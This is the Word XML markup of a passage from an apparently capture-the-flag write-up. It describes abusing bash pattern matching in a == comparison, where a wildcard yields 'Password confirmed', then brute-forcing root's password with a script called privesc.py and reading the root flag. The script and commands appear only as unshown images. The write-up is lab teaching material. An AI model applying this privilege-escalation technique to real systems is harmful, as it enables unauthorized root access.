            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>==</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator. This bash operator </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uses pattern matching instead of interpreting it as a string. If we give wildcard </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:rStyle w:val="Enfasigrassetto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it gives some weird output, it says Password confirmed, so we need to brute force the password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> So, I developed a script called </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privesc.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to try to brute force the password. By running this script, I found the root’s password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7F716" w14:textId="77777777" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A" w:rsidP="00B22A3A">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3786F239" wp14:editId="6DF814F1">
            <wp:extent cx="2918460" cy="518160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98379462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518160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576C221" w14:textId="482E943D" w:rsidR="009A2540" w:rsidRDefault="00B22A3A" w:rsidP="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc157155793"/>
      <w:r w:rsidRPr="00B22A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B22A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Picture \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00303595">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B22A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Root's password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="3C880D61" w14:textId="5015E91A" w:rsidR="009A2540" w:rsidRDefault="00B22A3A" w:rsidP="00837836">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To log in the system as root, I only need to try to use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB2E00" w14:textId="77777777" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A" w:rsidP="00B22A3A">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F75EDD" wp14:editId="039C08A0">
            <wp:extent cx="2705100" cy="899160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183056453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899160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C6913" w14:textId="28CA9DCE" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A" w:rsidP="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc157155794"/>
      <w:r w:rsidRPr="00B22A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Picture </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B22A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Picture \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00303595">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B22A3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Log in as root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="79397B6B" w14:textId="1985FDE4" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A" w:rsidP="00837836">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So, the root flag is in its home directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6568C319" w14:textId="77777777" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A" w:rsidP="00B22A3A">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D205DF0" wp14:editId="04A30DBD">
            <wp:extent cx="3604260" cy="617220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16811262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617220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE8DC9" w14:textId="6789EEA3" w:rsidR="00B22A3A" w:rsidRPr="009A2540" w:rsidRDefault="00B22A3A" w:rsidP="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc157155795"/>
      <w:r>
        <w:t xml:space="preserve">Picture </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Picture \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00303595">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Root flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:sectPr w:rsidR="00B22A3A" w:rsidRPr="009A2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1177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="656A1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8085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303595"/>
    <w:rsid w:val="003E7890"/>
    <w:rsid w:val="00476343"/>
    <w:rsid w:val="004917A9"/>
    <w:rsid w:val="004E245C"/>
    <w:rsid w:val="0056210F"/>
    <w:rsid w:val="005D07C6"/>
    <w:rsid w:val="006D481D"/>
    <w:rsid w:val="00763E93"/>
    <w:rsid w:val="00837836"/>
    <w:rsid w:val="008F0C16"/>
    <w:rsid w:val="00915D60"/>
    <w:rsid w:val="009A2540"/>
    <w:rsid w:val="009A4998"/>
    <w:rsid w:val="00A000F6"/>
    <w:rsid w:val="00A84B06"/>
    <w:rsid w:val="00AE7EC9"/>
    <w:rsid w:val="00B2247E"/>
    <w:rsid w:val="00B22A3A"/>
    <w:rsid w:val="00BC3B9E"/>
    <w:rsid w:val="00CB3015"/>
    <w:rsid w:val="00E11AAF"/>
    <w:rsid w:val="00E151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paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0056210F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00476343"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:rsid w:val="00763E93"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="DCDCCC"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasigrassetto">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="009A2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1367">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="213863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3-32314"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1040</Words>
  <Characters>5929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Kladìus</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2024-01-25T23:03:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-25T21:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-25T23:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>